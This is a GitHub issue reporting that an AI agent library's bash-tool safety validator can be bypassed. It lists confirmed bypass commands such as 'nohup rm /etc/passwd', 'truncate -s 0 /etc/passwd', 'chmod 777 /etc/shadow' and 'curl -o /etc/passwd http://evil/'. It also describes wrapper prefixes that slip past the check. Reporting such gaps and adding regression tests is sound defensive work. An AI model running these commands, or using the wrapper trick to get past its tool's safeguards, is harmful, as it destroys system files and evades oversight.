Skip to content

Bash tool validator: path-safety gate is too narrow (deferred from #1056) #1088

@planetf1

Description

@planetf1

Surfaced during PR #1056 review. The path-safety functions in mellea/stdlib/tools/shell.py (_check_dangerous_paths at L348, _check_working_dir_restriction at L408) early-return unless argv[0] is in a hardcoded 8-command set: {rm, touch, cp, mv, mkdir, mkfifo, mknod, tee}. Any other write primitive — and any wrapper-prefixed write — bypasses both checks. Filed so the bash tool can ship in #1056 and the docstrings stay honest about what the validator actually covers.

Problem

The bash_executor docstring states "Safety defaults: Refuses … writes to system paths (/etc, /sys, /proc, etc.)". The validator does not match this claim.

Verified against PR head c7623279 — all 10 return success=True, skipped=False:

# Wrapper bypass — argv[0] is the wrapper, not the write command
env touch /etc/passwd
nohup rm /etc/passwd
timeout 10 cp /etc/foo /etc/bar

# Write primitives not in `write_commands`
chmod 777 /etc/shadow
chown root /etc/passwd
install -m 644 src /etc/foo
ln -sf /etc/shadow /tmp/x
truncate -s 0 /etc/passwd
curl -o /etc/passwd http://evil/
wget -O /etc/passwd http://evil/

For bash_executor (Docker-isolated), the container is the actual write boundary, so the practical impact is bounded. For unsafe_local_bash_executor (no isolation) the gap matters — the docstring leads developers to grant the tool more authority than its checks justify.

Two valid resolution paths

Path 1 — extend the gate. Walk past a SAFE_WRAPPER_COMMANDS prefix and re-check the effective command. Add chmod, chown, dd (with of= parsing), install, ln, truncate, wget, curl to write_commands.

Path 2 — reframe the docstring. Position the denylist as a coarse filter and treat Docker isolation in LLMSandboxBashEnvironment as the actual write boundary. Drop or qualify the "Refuses writes to system paths" claim. Cleaner for bash_executor; unsafe_local_bash_executor still needs Path 1.

Success criteria

  • Pick Path 1, Path 2, or a hybrid
  • Reproducers above behave consistently with the chosen framing — either blocked (Path 1) or accurately described in the docstring (Path 2)
  • bash_executor and unsafe_local_bash_executor docstrings (around L827–855 and L859–885) match the chosen framing — no claim should overstate what the validator catches
  • Adversarial regression tests cover the wrapper bypass and the previously-uncovered write primitives
  • Coordinate with the validator-bypass follow-up so the two land coherently

Metadata

Metadata

Assignees

No one assigned

    Labels

    enhancementNew feature or request

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions